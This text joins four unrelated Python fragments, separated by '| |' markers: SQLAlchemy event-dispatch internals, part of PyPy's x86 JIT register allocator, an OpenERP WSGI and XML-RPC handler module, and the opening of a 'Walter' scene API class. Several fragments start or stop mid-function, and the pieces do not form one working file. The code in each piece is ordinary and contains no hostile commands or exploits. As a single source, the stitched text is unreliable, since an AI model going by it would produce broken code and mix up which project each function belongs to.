if _is_event_name(attr):
getattr(self, attr).for_modify(self).clear()
def _event_descriptors(target):
return [getattr(target, k) for k in dir(target) if _is_event_name(k)]
class _EventMeta(type):
"""Intercept new Event subclasses and create
associated _Dispatch classes."""
def __init__(cls, classname, bases, dict_):
_create_dispatcher_class(cls, classname, bases, dict_)
return type.__init__(cls, classname, bases, dict_)
def _create_dispatcher_class(cls, classname, bases, dict_):
"""Create a :class:`._Dispatch` class corresponding to an
:class:`.Events` class."""
# there's all kinds of ways to do this,
# i.e. make a Dispatch class that shares the '_listen' method
# of the Event class, this is the straight monkeypatch.
dispatch_base = getattr(cls, 'dispatch', _Dispatch)
cls.dispatch = dispatch_cls = type("%sDispatch" % classname,
(dispatch_base, ), {})
dispatch_cls._listen = cls._listen
for k in dict_:
if _is_event_name(k):
setattr(dispatch_cls, k, _DispatchDescriptor(dict_[k]))
_registrars[k].append(cls)
def _remove_dispatcher(cls):
for k in dir(cls):
if _is_event_name(k):
_registrars[k].remove(cls)
if not _registrars[k]:
del _registrars[k]
class Events(util.with_metaclass(_EventMeta, object)):
"""Define event listening functions for a particular target type."""
@classmethod
def _accept_with(cls, target):
# Mapper, ClassManager, Session override this to
# also accept classes, scoped_sessions, sessionmakers, etc.
if hasattr(target, 'dispatch') and (
isinstance(target.dispatch, cls.dispatch) or \
isinstance(target.dispatch, type) and \
issubclass(target.dispatch, cls.dispatch)
):
return target
else:
return None
@classmethod
def _listen(cls, target, identifier, fn, propagate=False, insert=False):
if insert:
getattr(target.dispatch, identifier).\
for_modify(target.dispatch).insert(fn, target, propagate)
else:
getattr(target.dispatch, identifier).\
for_modify(target.dispatch).append(fn, target, propagate)
@classmethod
def _remove(cls, target, identifier, fn):
getattr(target.dispatch, identifier).remove(fn, target)
@classmethod
def _clear(cls):
cls.dispatch._clear()
class _DispatchDescriptor(object):
"""Class-level attributes on :class:`._Dispatch` classes."""
def __init__(self, fn):
self.__name__ = fn.__name__
self.__doc__ = fn.__doc__
self._clslevel = weakref.WeakKeyDictionary()
self._empty_listeners = weakref.WeakKeyDictionary()
def _contains(self, cls, evt):
return cls in self._clslevel and \
evt in self._clslevel[cls]
def insert(self, obj, target, propagate):
assert isinstance(target, type), \
"Class-level Event targets must be classes."
stack = [target]
while stack:
cls = stack.pop(0)
stack.extend(cls.__subclasses__())
if cls is not target and cls not in self._clslevel:
self.update_subclass(cls)
else:
if cls not in self._clslevel:
self._clslevel[cls] = []
self._clslevel[cls].insert(0, obj)
def append(self, obj, target, propagate):
assert isinstance(target, type), \
"Class-level Event targets must be classes."
stack = [target]
while stack:
cls = stack.pop(0)
stack.extend(cls.__subclasses__())
if cls is not target and cls not in self._clslevel:
self.update_subclass(cls)
else:
if cls not in self._clslevel:
self._clslevel[cls] = []
self._clslevel[cls].append(obj)
def update_subclass(self, target):
if target not in self._clslevel:
self._clslevel[target] = []
clslevel = self._clslevel[target]
for cls in target.__mro__[1:]:
if cls in self._clslevel:
clslevel.extend([
fn for fn
in self._clslevel[cls]
if fn not in clslevel
])
def remove(self, obj, target):
stack = [target]
while stack:
cls = stack.pop(0)
stack.extend(cls.__subclasses__())
if cls in self._clslevel:
self._clslevel[cls].remove(obj)
def clear(self):
"""Clear all class level listeners"""
for dispatcher in self._clslevel.values():
dispatcher[:] = []
def for_modify(self, obj):
"""Return an event collection which can be modified.
For _DispatchDescriptor at the class level of
a dispatcher, this returns self.
"""
return self
def __get__(self, obj, cls):
if obj is None:
return self
elif obj._parent_cls in self._empty_listeners:
ret = self._empty_listeners[obj._parent_cls]
else:
self._empty_listeners[obj._parent_cls] = ret = \
_EmptyListener(self, obj._parent_cls)
# assigning it to __dict__ means
# memoized for fast re-access. but more memory.
obj.__dict__[self.__name__] = ret
return ret
class _EmptyListener(object):
"""Serves as a class-level interface to the events
served by a _DispatchDescriptor, when there are no
instance-level events present.
Is replaced by _ListenerCollection when instance-level
events are added.
"""
def __init__(self, parent, target_cls):
if target_cls not in parent._clslevel:
parent.update_subclass(target_cls)
self.parent = parent
self.parent_listeners = parent._clslevel[target_cls]
self.name = parent.__name__
self.propagate = frozenset()
self.listeners = ()
def for_modify(self, obj):
"""Return an event collection which can be modified.
For _EmptyListener at the instance level of
a dispatcher, this generates a new
_ListenerCollection, applies it to the instance,
and returns it.
"""
result = _ListenerCollection(self.parent, obj._parent_cls)
if obj.__dict__[self.name] is self:
obj.__dict__[self.name] = result
return result
def _needs_modify(self, *args, **kw):
raise NotImplementedError("need to call for_modify()")
exec_once = insert = append = remove = clear = _needs_modify
def __call__(self, *args, **kw):
"""Execute this event."""
for fn in self.parent_listeners:
fn(*args, **kw)
def __len__(self):
return len(self.parent_listeners)
def __iter__(self):
return iter(self.parent_listeners)
def __bool__(self):
return bool(self.parent_listeners)
__nonzero__ = __bool__
class _CompoundListener(object):
_exec_once = False
def exec_once(self, *args, **kw):
"""Execute this event, but only if it has not been
executed already for this collection."""
if not self._exec_once:
self(*args, **kw)
self._exec_once = True
# I'm not entirely thrilled about the overhead here,
# but this allows class-level listeners to be added
# at any point.
#
# In the absense of instance-level listeners,
# we stay with the _EmptyListener object when called
# at the instance level.
def __call__(self, *args, **kw):
"""Execute this event."""
for fn in self.parent_listeners:
fn(*args, **kw)
for fn in self.listeners:
fn(*args, **kw)
def __len__(self):
return len(self.parent_listeners) + len(self.listeners)
def __iter__(self):
return chain(self.parent_listeners, self.listeners)
def __bool__(self):
return bool(self.listeners or self.parent_listeners)
__nonzero__ = __bool__
class _ListenerCollection(_CompoundListener):
"""Instance-level attributes on instances of :class:`._Dispatch`.
Represents a collection of listeners.
As of 0.7.9, _ListenerCollection is only first
created via the _EmptyListener.for_modify() method.
"""
def __init__(self, parent, target_cls):
if target_cls not in parent._clslevel:
parent.update_subclass(target_cls)
self.parent_listeners = parent._clslevel[target_cls]
self.name = parent.__name__
self.listeners = []
self.propagate = set()
def for_modify(self, obj):
"""Return an event collection which can | |
|= r_uint(1) << (val % (WORD * 8))
return gcmap
def consider_gc_store(self, op):
args = op.getarglist()
base_loc = self.rm.make_sure_var_in_reg(op.getarg(0), args)
size_box = op.getarg(3)
assert isinstance(size_box, ConstInt)
size = size_box.value
assert size >= 1
if size == 1:
need_lower_byte = True
else:
need_lower_byte = False
value_loc = self.make_sure_var_in_reg(op.getarg(2), args,
need_lower_byte=need_lower_byte)
ofs_loc = self.rm.make_sure_var_in_reg(op.getarg(1), args)
self.perform_discard(op, [base_loc, ofs_loc, value_loc,
imm(size)])
def consider_gc_store_indexed(self, op):
args = op.getarglist()
base_loc = self.rm.make_sure_var_in_reg(op.getarg(0), args)
scale_box = op.getarg(3)
offset_box = op.getarg(4)
size_box = op.getarg(5)
assert isinstance(scale_box, ConstInt)
assert isinstance(offset_box, ConstInt)
assert isinstance(size_box, ConstInt)
factor = scale_box.value
offset = offset_box.value
size = size_box.value
assert size >= 1
if size == 1:
need_lower_byte = True
else:
need_lower_byte = False
value_loc = self.make_sure_var_in_reg(op.getarg(2), args,
need_lower_byte=need_lower_byte)
ofs_loc = self.rm.make_sure_var_in_reg(op.getarg(1), args)
self.perform_discard(op, [base_loc, ofs_loc, value_loc,
imm(factor), imm(offset), imm(size)])
def consider_increment_debug_counter(self, op):
base_loc = self.loc(op.getarg(0))
self.perform_discard(op, [base_loc])
def _consider_gc_load(self, op):
args = op.getarglist()
base_loc = self.rm.make_sure_var_in_reg(op.getarg(0), args)
ofs_loc = self.rm.make_sure_var_in_reg(op.getarg(1), args)
result_loc = self.force_allocate_reg(op)
size_box = op.getarg(2)
assert isinstance(size_box, ConstInt)
nsize = size_box.value # negative for "signed"
size_loc = imm(abs(nsize))
if nsize < 0:
sign_loc = imm1
else:
sign_loc = imm0
self.perform(op, [base_loc, ofs_loc, size_loc, sign_loc], result_loc)
consider_gc_load_i = _consider_gc_load
consider_gc_load_r = _consider_gc_load
consider_gc_load_f = _consider_gc_load
def _consider_gc_load_indexed(self, op):
args = op.getarglist()
base_loc = self.rm.make_sure_var_in_reg(op.getarg(0), args)
ofs_loc = self.rm.make_sure_var_in_reg(op.getarg(1), args)
result_loc = self.force_allocate_reg(op)
scale_box = op.getarg(2)
offset_box = op.getarg(3)
size_box = op.getarg(4)
assert isinstance(scale_box, ConstInt)
assert isinstance(offset_box, ConstInt)
assert isinstance(size_box, ConstInt)
scale = scale_box.value
offset = offset_box.value
nsize = size_box.value # negative for "signed"
size_loc = imm(abs(nsize))
if nsize < 0:
sign_loc = imm1
else:
sign_loc = imm0
locs = [base_loc, ofs_loc, imm(scale), imm(offset), size_loc, sign_loc]
self.perform(op, locs, result_loc)
consider_gc_load_indexed_i = _consider_gc_load_indexed
consider_gc_load_indexed_r = _consider_gc_load_indexed
consider_gc_load_indexed_f = _consider_gc_load_indexed
def consider_int_is_true(self, op):
# doesn't need arg to be in a register
argloc = self.loc(op.getarg(0))
resloc = self.force_allocate_reg_or_cc(op)
self.perform(op, [argloc], resloc)
consider_int_is_zero = consider_int_is_true
def _consider_same_as(self, op):
argloc = self.loc(op.getarg(0))
resloc = self.force_allocate_reg(op)
self.perform(op, [argloc], resloc)
consider_cast_ptr_to_int = _consider_same_as
consider_cast_int_to_ptr = _consider_same_as
consider_same_as_i = _consider_same_as
consider_same_as_r = _consider_same_as
consider_same_as_f = _consider_same_as
def consider_load_from_gc_table(self, op):
resloc = self.rm.force_allocate_reg(op)
self.perform(op, [], resloc)
def consider_int_force_ge_zero(self, op):
argloc = self.make_sure_var_in_reg(op.getarg(0))
resloc = self.force_allocate_reg(op, [op.getarg(0)])
self.perform(op, [argloc], resloc)
def consider_load_effective_address(self, op):
p0 = op.getarg(0)
i0 = op.getarg(1)
ploc = self.make_sure_var_in_reg(p0, [i0])
iloc = self.make_sure_var_in_reg(i0, [p0])
res = self.rm.force_allocate_reg(op, [p0, i0])
assert isinstance(op.getarg(2), ConstInt)
assert isinstance(op.getarg(3), ConstInt)
self.assembler.load_effective_addr(iloc, op.getarg(2).getint(),
op.getarg(3).getint(), res, ploc)
def _consider_math_read_timestamp(self, op):
# hint: try to move unrelated registers away from eax and edx now
self.rm.spill_or_move_registers_before_call([eax, edx])
tmpbox_high = TempVar()
self.rm.force_allocate_reg(tmpbox_high, selected_reg=eax)
if longlong.is_64_bit:
# on 64-bit, use rax as temporary register and returns the
# result in rdx
result_loc = self.rm.force_allocate_reg(op,
selected_reg=edx)
self.perform_math(op, [], result_loc)
else:
# on 32-bit, use both eax and edx as temporary registers,
# use a temporary xmm register, and returns the result in
# another xmm register.
tmpbox_low = TempVar()
self.rm.force_allocate_reg(tmpbox_low, selected_reg=edx)
xmmtmpbox = TempVar()
xmmtmploc = self.xrm.force_allocate_reg(xmmtmpbox)
result_loc = self.xrm.force_allocate_reg(op)
self.perform_math(op, [xmmtmploc], result_loc)
self.xrm.possibly_free_var(xmmtmpbox)
self.rm.possibly_free_var(tmpbox_low)
self.rm.possibly_free_var(tmpbox_high)
def compute_hint_frame_locations(self, operations):
# optimization only: fill in the 'hint_frame_pos' dictionary
# of 'fm' based on the JUMP at the end of the loop, by looking
# at where we would like the boxes to be after the jump.
op = operations[-1]
if op.getopnum() != rop.JUMP:
return
self.final_jump_op = op
self.final_jump_op_position = len(operations) - 1
descr = op.getdescr()
assert isinstance(descr, TargetToken)
if descr._ll_loop_code != 0:
# if the target LABEL was already compiled, i.e. if it belongs
# to some already-compiled piece of code
self._compute_hint_locations_from_descr(descr)
#else:
# The loop ends in a JUMP going back to a LABEL in the same loop.
# We cannot fill 'hint_frame_pos' immediately, but we can
# wait until the corresponding consider_label() to know where the
# we would like the boxes to be after the jump.
# YYY can we do coalescing hints in the new register allocation model?
def _compute_hint_locations_from_descr(self, descr):
arglocs = descr._x86_arglocs
jump_op = self.final_jump_op
assert len(arglocs) == jump_op.numargs()
hinted = []
for i in range(jump_op.numargs()):
box = jump_op.getarg(i)
if not isinstance(box, Const):
loc = arglocs[i]
if isinstance(loc, FrameLoc):
self.fm.hint_frame_pos[box] = self.fm.get_loc_index(loc)
else:
if box not in hinted:
hinted.append(box)
assert isinstance(loc, RegLoc)
self.longevity.fixed_register(
self.final_jump_op_position,
loc, box)
def consider_jump(self, op):
assembler = self.assembler
assert self.jump_target_descr is None
descr = op.getdescr()
assert isinstance(descr, TargetToken)
arglocs = descr._x86_arglocs
self.jump_target_descr = descr
# Part about non-floats
src_locations1 = []
dst_locations1 = []
# Part about floats
src_locations2 = []
dst_locations2 = []
# Build the four lists
for i in range(op.numargs()):
box = op.getarg(i)
src_loc = self.loc(box)
dst_loc = arglocs[i]
if box.type != FLOAT and not box.is_vector():
src_locations1.append(src_loc)
dst_locations1.append(dst_loc)
else:
src_locations2.append(src_loc)
dst_locations2.append(dst_loc)
# Do we have a temp var?
if IS_X86_64:
tmpreg = X86_64_SCRATCH_REG
xmmtmp = X86_64_XMM_SCRATCH_REG
else:
tmpreg = None
xmmtmp = None
# Do the remapping
num_moves = remap_frame_layout_mixed(assembler,
src_locations1, dst_locations1, tmpreg,
src_locations2, dst_locations2, xmmtmp)
self.possibly_free_vars_for_op(op)
assembler.closing_jump(self.jump_target_descr)
assembler.num_moves_jump += num_moves
def consider_enter_portal_frame(self, op):
self.assembler.enter_portal_frame(op)
def consider_leave_portal_frame(self, op):
self.assembler.leave_portal_frame(op)
def consider_jit_debug(self, op):
pass
def _consider_force_spill(self, op):
# This operation is used only for testing
self.force_spill_var(op.getarg(0))
def consider_force_token(self, op):
# XXX for now we return a regular reg
#self.rm.force_allocate_frame_reg(op)
self.assembler.force_token(self.rm.force_allocate_reg(op))
def consider_label(self, op):
descr = op.getdescr()
assert isinstance(descr, TargetToken)
inputargs = op.getarglist()
arglocs = [None] * len(inputargs)
#
# we use force_spill() on the boxes that are not going to be really
# used any more in the loop, but that are kept alive anyway
# by being in a next LABEL's or a JUMP's argument or fail_args
# of some guard
position = self.rm.position
for arg in inputargs:
assert not isinstance(arg, Const)
if self.longevity[arg].is_last_real_use_before(position):
self.force_spill_var(arg)
#
# we need to make sure that no variable is stored in ebp
for arg in inputargs:
if self.loc(arg) is ebp:
loc2 = self.fm.loc(arg)
self.assembler.mc.MOV(loc2, ebp)
self.rm.bindings_to_frame_reg.clear()
#
for i in range(len(inputargs)):
arg = inputargs[i]
assert not isinstance(arg, Const)
loc = self.loc(arg)
assert loc is not ebp
arglocs[i] = loc
if isinstance(loc, RegLoc):
self.fm.mark_as_free(arg)
#
# if we are too close to the start of the loop, the label's target may
# get overridden by redirect_call_assembler(). (rare case)
self.flush_loop()
#
descr._x86_arglocs = arglocs
descr._ll_loop_code = self.assembler.mc.get_relative_pos()
descr._x86_clt = self.assembler.current_clt
self.assembler.target_tokens_currently_compiling[descr] = None
self.possibly_free_vars_for_op(op)
self.assembler.label()
#
# if the LABEL's descr is precisely the target of the JUMP at the
# end of the same loop, i.e. if what we are compiling is a single
# loop that ends up jumping to this LABEL, then we can now provide
# the hints about the expected position of the spilled variables.
jump_op = self.final_jump_op
if jump_op is not None and jump_op.getdescr() is descr:
self._compute_hint_locations_from_descr(descr)
def consider_guard_not_forced_2(self, op):
self.rm.before_call(op.getfailargs(), save_all_regs=True)
self.xrm.before_call(op.getfailargs(), save_all_regs=True)
fail_locs = [self.loc(v) for v in op.getfailargs()]
self.assembler.store_force_descr(op, fail_locs,
self.fm.get_frame_depth())
self.possibly_free_vars(op.getfailargs())
def consider_keepalive(self, op):
pass
def _scaled_addr(self, index_loc, itemsize_loc,
base_loc, ofs_loc):
assert isinstance(itemsize_loc, ImmedLoc)
itemsize = itemsize_loc.value
if isinstance(index_loc, ImmedLoc):
temp_loc = imm(index_loc.value * itemsize)
shift = 0
else:
assert valid_addressing_size(itemsize), "rewrite did not correctly handle shift/mul!"
temp_loc = index_loc
shift = get_scale(itemsize)
assert isinstance(ofs_loc, ImmedLoc)
return AddressLoc(base_loc, temp_loc, shift, ofs_loc.value)
def consider_zero_array(self, op):
_, baseofs, _ = unpack_arraydescr(op.getdescr())
length_box = op.getarg(2)
scale_box = op.getarg(3)
assert isinstance(scale_box, ConstInt)
start_itemsize = scale_box.value
len_scale_box = op.getarg(4)
assert isinstance(len_scale_box, ConstInt)
len_itemsize = len_scale_box.value
# rewrite handles the mul of a constant length box
constbytes = -1
if isinstance(length_box, ConstInt):
constbytes = length_box.getint()
args = op.getarglist()
base_loc = self.rm.make_sure_var_in_reg(args[0], args)
startindex_loc = self.rm.make_sure_var_in_reg(args[1], args)
if 0 <= constbytes <= 16 * 8:
if IS_X86_64:
null_loc = X86_64_XMM_SCRATCH_REG
else:
null_box = TempVar()
null_loc = self.xrm.force_allocate_reg(null_box)
self.xrm.possibly_free_var(null_box)
self.perform_discard(op, [base_loc, startindex_loc,
imm(constbytes), imm(start_itemsize),
imm(baseofs), null_loc])
else:
# base_loc and startindex_loc are in two regs here (or they are
# immediates). Compute the dstaddr_loc, which is the raw
# address that we will pass as first argument to memset().
# It can be in the same register as either one, but not in
# args[2], because we're still needing the latter.
dstaddr_box = TempVar()
dstaddr_loc = self.rm.force_allocate_reg(dstaddr_box, [args[2]])
itemsize_loc = imm(start_itemsize)
dst_addr | |
<gh_stars>1-10
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2011-2012 OpenERP s.a. (<http://openerp.com>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
"""
WSGI stack, common code.
"""
import httplib
import urllib
import xmlrpclib
import StringIO
import errno
import logging
import os
import signal
import sys
import threading
import traceback
import werkzeug.serving
import werkzeug.contrib.fixers
import openerp
import openerp.modules
import openerp.tools.config as config
import websrv_lib
_logger = logging.getLogger(__name__)
# XML-RPC fault codes. Some care must be taken when changing these: the
# constants are also defined client-side and must remain in sync.
# User code must use the exceptions defined in ``openerp.exceptions`` (not
# create directly ``xmlrpclib.Fault`` objects).
RPC_FAULT_CODE_CLIENT_ERROR = 1 # indistinguishable from app. error.
RPC_FAULT_CODE_APPLICATION_ERROR = 1
RPC_FAULT_CODE_WARNING = 2
RPC_FAULT_CODE_ACCESS_DENIED = 3
RPC_FAULT_CODE_ACCESS_ERROR = 4
# The new (6.1) versioned RPC paths.
XML_RPC_PATH = '/openerp/xmlrpc'
XML_RPC_PATH_1 = '/openerp/xmlrpc/1'
JSON_RPC_PATH = '/openerp/jsonrpc'
JSON_RPC_PATH_1 = '/openerp/jsonrpc/1'
def xmlrpc_return(start_response, service, method, params, legacy_exceptions=False):
"""
Helper to call a service's method with some params, using a wsgi-supplied
``start_response`` callback.
This is the place to look at to see the mapping between core exceptions
and XML-RPC fault codes.
"""
# Map OpenERP core exceptions to XML-RPC fault codes. Specific exceptions
# defined in ``openerp.exceptions`` are mapped to specific fault codes;
# all the other exceptions are mapped to the generic
# RPC_FAULT_CODE_APPLICATION_ERROR value.
# This also mimics SimpleXMLRPCDispatcher._marshaled_dispatch() for
# exception handling.
try:
result = openerp.netsvc.dispatch_rpc(service, method, params)
response = xmlrpclib.dumps((result,), methodresponse=1, allow_none=False, encoding=None)
except Exception, e:
if legacy_exceptions:
response = xmlrpc_handle_exception_legacy(e)
else:
response = xmlrpc_handle_exception(e)
start_response("200 OK", [('Content-Type','text/xml'), ('Content-Length', str(len(response)))])
return [response]
def xmlrpc_handle_exception(e):
if isinstance(e, openerp.osv.osv.except_osv): # legacy
fault = xmlrpclib.Fault(RPC_FAULT_CODE_WARNING, openerp.tools.ustr(e.value))
response = xmlrpclib.dumps(fault, allow_none=False, encoding=None)
elif isinstance(e, openerp.exceptions.Warning):
fault = xmlrpclib.Fault(RPC_FAULT_CODE_WARNING, str(e))
response = xmlrpclib.dumps(fault, allow_none=False, encoding=None)
elif isinstance (e, openerp.exceptions.AccessError):
fault = xmlrpclib.Fault(RPC_FAULT_CODE_ACCESS_ERROR, str(e))
response = xmlrpclib.dumps(fault, allow_none=False, encoding=None)
elif isinstance(e, openerp.exceptions.AccessDenied):
fault = xmlrpclib.Fault(RPC_FAULT_CODE_ACCESS_DENIED, str(e))
response = xmlrpclib.dumps(fault, allow_none=False, encoding=None)
elif isinstance(e, openerp.exceptions.DeferredException):
info = e.traceback
# Which one is the best ?
formatted_info = "".join(traceback.format_exception(*info))
#formatted_info = openerp.tools.exception_to_unicode(e) + '\n' + info
fault = xmlrpclib.Fault(RPC_FAULT_CODE_APPLICATION_ERROR, formatted_info)
response = xmlrpclib.dumps(fault, allow_none=False, encoding=None)
else:
if hasattr(e, 'message') and e.message == 'AccessDenied': # legacy
fault = xmlrpclib.Fault(RPC_FAULT_CODE_ACCESS_DENIED, str(e))
response = xmlrpclib.dumps(fault, allow_none=False, encoding=None)
else:
info = sys.exc_info()
# Which one is the best ?
formatted_info = "".join(traceback.format_exception(*info))
#formatted_info = openerp.tools.exception_to_unicode(e) + '\n' + info
fault = xmlrpclib.Fault(RPC_FAULT_CODE_APPLICATION_ERROR, formatted_info)
response = xmlrpclib.dumps(fault, allow_none=None, encoding=None)
return response
def xmlrpc_handle_exception_legacy(e):
if isinstance(e, openerp.osv.osv.except_osv):
fault = xmlrpclib.Fault('warning -- ' + e.name + '\n\n' + e.value, '')
response = xmlrpclib.dumps(fault, allow_none=False, encoding=None)
elif isinstance(e, openerp.exceptions.Warning):
fault = xmlrpclib.Fault('warning -- Warning\n\n' + str(e), '')
response = xmlrpclib.dumps(fault, allow_none=False, encoding=None)
elif isinstance(e, openerp.exceptions.AccessError):
fault = xmlrpclib.Fault('warning -- AccessError\n\n' + str(e), '')
response = xmlrpclib.dumps(fault, allow_none=False, encoding=None)
elif isinstance(e, openerp.exceptions.AccessDenied):
fault = xmlrpclib.Fault('AccessDenied', str(e))
response = xmlrpclib.dumps(fault, allow_none=False, encoding=None)
elif isinstance(e, openerp.exceptions.DeferredException):
info = e.traceback
formatted_info = "".join(traceback.format_exception(*info))
fault = xmlrpclib.Fault(openerp.tools.ustr(e.message), formatted_info)
response = xmlrpclib.dumps(fault, allow_none=False, encoding=None)
else:
info = sys.exc_info()
formatted_info = "".join(traceback.format_exception(*info))
fault = xmlrpclib.Fault(openerp.tools.exception_to_unicode(e), formatted_info)
response = xmlrpclib.dumps(fault, allow_none=None, encoding=None)
return response
def wsgi_xmlrpc_1(environ, start_response):
""" The main OpenERP WSGI handler."""
if environ['REQUEST_METHOD'] == 'POST' and environ['PATH_INFO'].startswith(XML_RPC_PATH_1):
length = int(environ['CONTENT_LENGTH'])
data = environ['wsgi.input'].read(length)
params, method = xmlrpclib.loads(data)
path = environ['PATH_INFO'][len(XML_RPC_PATH_1):]
if path.startswith('/'): path = path[1:]
if path.endswith('/'): path = path[:-1]
path = path.split('/')
# All routes are hard-coded.
# No need for a db segment.
if len(path) == 1:
service = path[0]
if service == 'common':
if method in ('server_version',):
service = 'db'
return xmlrpc_return(start_response, service, method, params)
# A db segment must be given.
elif len(path) == 2:
service, db_name = path
params = (db_name,) + params
return xmlrpc_return(start_response, service, method, params)
# A db segment and a model segment must be given.
elif len(path) == 3 and path[0] == 'model':
service, db_name, model_name = path
params = (db_name,) + params[:2] + (model_name,) + params[2:]
service = 'object'
return xmlrpc_return(start_response, service, method, params)
# The body has been read, need to raise an exception (not return None).
fault = xmlrpclib.Fault(RPC_FAULT_CODE_CLIENT_ERROR, '')
response = xmlrpclib.dumps(fault, allow_none=None, encoding=None)
start_response("200 OK", [('Content-Type','text/xml'), ('Content-Length', str(len(response)))])
return [response]
def wsgi_xmlrpc(environ, start_response):
""" WSGI handler to return the versions."""
if environ['REQUEST_METHOD'] == 'POST' and environ['PATH_INFO'].startswith(XML_RPC_PATH):
length = int(environ['CONTENT_LENGTH'])
data = environ['wsgi.input'].read(length)
params, method = xmlrpclib.loads(data)
path = environ['PATH_INFO'][len(XML_RPC_PATH):]
if path.startswith('/'): path = path[1:]
if path.endswith('/'): path = path[:-1]
path = path.split('/')
# All routes are hard-coded.
if len(path) == 1 and path[0] == '' and method in ('version',):
return xmlrpc_return(start_response, 'common', method, ())
# The body has been read, need to raise an exception (not return None).
fault = xmlrpclib.Fault(RPC_FAULT_CODE_CLIENT_ERROR, '')
response = xmlrpclib.dumps(fault, allow_none=None, encoding=None)
start_response("200 OK", [('Content-Type','text/xml'), ('Content-Length', str(len(response)))])
return [response]
def wsgi_xmlrpc_legacy(environ, start_response):
if environ['REQUEST_METHOD'] == 'POST' and environ['PATH_INFO'].startswith('/xmlrpc/'):
length = int(environ['CONTENT_LENGTH'])
data = environ['wsgi.input'].read(length)
path = environ['PATH_INFO'][len('/xmlrpc/'):] # expected to be one of db, object, ...
params, method = xmlrpclib.loads(data)
return xmlrpc_return(start_response, path, method, params, True)
def wsgi_webdav(environ, start_response):
pi = environ['PATH_INFO']
if environ['REQUEST_METHOD'] == 'OPTIONS' and pi in ['*','/']:
return return_options(environ, start_response)
elif pi.startswith('/webdav'):
http_dir = websrv_lib.find_http_service(pi)
if http_dir:
path = pi[len(http_dir.path):]
if path.startswith('/'):
environ['PATH_INFO'] = path
else:
environ['PATH_INFO'] = '/' + path
return http_to_wsgi(http_dir)(environ, start_response)
def return_options(environ, start_response):
# Microsoft specific header, see
# http://www.ibm.com/developerworks/rational/library/2089.html
if 'Microsoft' in environ.get('User-Agent', ''):
options = [('MS-Author-Via', 'DAV')]
else:
options = []
options += [('DAV', '1 2'), ('Allow', 'GET HEAD PROPFIND OPTIONS REPORT')]
start_response("200 OK", [('Content-Length', str(0))] + options)
return []
def http_to_wsgi(http_dir):
"""
Turn a BaseHTTPRequestHandler into a WSGI entry point.
Actually the argument is not a bare BaseHTTPRequestHandler but is wrapped
(as a class, so it needs to be instanciated) in a HTTPDir.
This code is adapted from wbsrv_lib.MultiHTTPHandler._handle_one_foreign().
It is a temporary solution: the HTTP sub-handlers (in particular the
document_webdav addon) have to be WSGIfied.
"""
def wsgi_handler(environ, start_response):
headers = {}
for key, value in environ.items():
if key.startswith('HTTP_'):
key = key[5:].replace('_', '-').title()
headers[key] = value
if key == 'CONTENT_LENGTH':
key = key.replace('_', '-').title()
headers[key] = value
if environ.get('Content-Type'):
headers['Content-Type'] = environ['Content-Type']
path = urllib.quote(environ.get('PATH_INFO', ''))
if environ.get('QUERY_STRING'):
path += '?' + environ['QUERY_STRING']
request_version = 'HTTP/1.1' # TODO
request_line = "%s %s %s\n" % (environ['REQUEST_METHOD'], path, request_version)
class Dummy(object):
pass
# Let's pretend we have a server to hand to the handler.
server = Dummy()
server.server_name = environ['SERVER_NAME']
server.server_port = int(environ['SERVER_PORT'])
# Initialize the underlying handler and associated auth. provider.
con = openerp.service.websrv_lib.noconnection(environ['wsgi.input'])
handler = http_dir.instanciate_handler(con, environ['REMOTE_ADDR'], server)
# Populate the handler as if it is called by a regular HTTP server
# and the request is already parsed.
handler.wfile = StringIO.StringIO()
handler.rfile = environ['wsgi.input']
handler.headers = headers
handler.command = environ['REQUEST_METHOD']
handler.path = path
handler.request_version = request_version
handler.close_connection = 1
handler.raw_requestline = request_line
handler.requestline = request_line
# Handle authentication if there is an auth. provider associated to
# the handler.
if hasattr(handler, 'auth_provider'):
try:
handler.auth_provider.checkRequest(handler, path)
except websrv_lib.AuthRequiredExc, ae:
# Darwin 9.x.x webdav clients will report "HTTP/1.0" to us, while they support (and need) the
# authorisation features of HTTP/1.1
if request_version != 'HTTP/1.1' and ('Darwin/9.' not in handler.headers.get('User-Agent', '')):
start_response("403 Forbidden", [])
return []
start_response("401 Authorization required", [
('WWW-Authenticate', '%s realm="%s"' % (ae.atype,ae.realm)),
# ('Connection', 'keep-alive'),
('Content-Type', 'text/html'),
('Content-Length', 4), # len(self.auth_required_msg)
])
return ['Blah'] # self.auth_required_msg
except websrv_lib.AuthRejectedExc,e:
start_response("403 %s" % (e.args[0],), [])
return []
method_name = 'do_' + handler.command
# Support the OPTIONS method even when not provided directly by the
# handler. TODO I would prefer to remove it and fix the handler if
# needed.
if not hasattr(handler, method_name):
if handler.command == 'OPTIONS':
return return_options(environ, start_response)
| |
"""API to control Walter."""
# Copyright 2017 <NAME>. All rights reserved.
OVERRIDE_TRANSFORM = 'transform'
OVERRIDE_SHADER = 'shader'
OVERRIDE_DISPLACEMENT = 'displacement'
OVERRIDE_ATTRIBUTE = 'attribute'
class Walter(object):
"""
This object represents the Walter API. The Walter Panel interacts with Maya
(in future it will interact with other packages) using this object.
"""
# Keeps track of the single instance of the class
__instance = None
def __new__(cls, *args, **kwargs):
"""
Create the instance if it hasn't been created already.
:returns: The new object instance.
"""
if not cls.__instance:
# Remember the instance so that no more are created.
instance = super(Walter, cls).__new__(cls, *args, **kwargs)
# Implementation details. We can switch them depending on
# the environment.
import walterPanel.walterMayaTraverser
instance.details = \
walterPanel.walterMayaTraverser.WalterMayaImplementation()
cls.__instance = instance
return cls.__instance
def origins(self):
"""
Return the list of all the origin items to display in the tree.
:returns: The list of all the origin items in the scene.
:rtype: list
"""
return self.details.origins()
def dir(self, origin, path):
"""
Return the list of child objects of the given path.
:Example:
.. code:: python
from pprint import pprint
from walter import Walter
objects = Walter().dir(
"walterStandinShape1", "/ships_greyjoy_shd_hi/mesh")
pprint(objects)
:Output:
.. code:: python
[u'/ships_greyjoy_shd_hi/mesh/M_defaultShip_GRP',
u'/ships_greyjoy_shd_hi/mesh/M_segmentsBreakA_GRP',
u'/ships_greyjoy_shd_hi/mesh/M_segmentsBreakB_GRP']
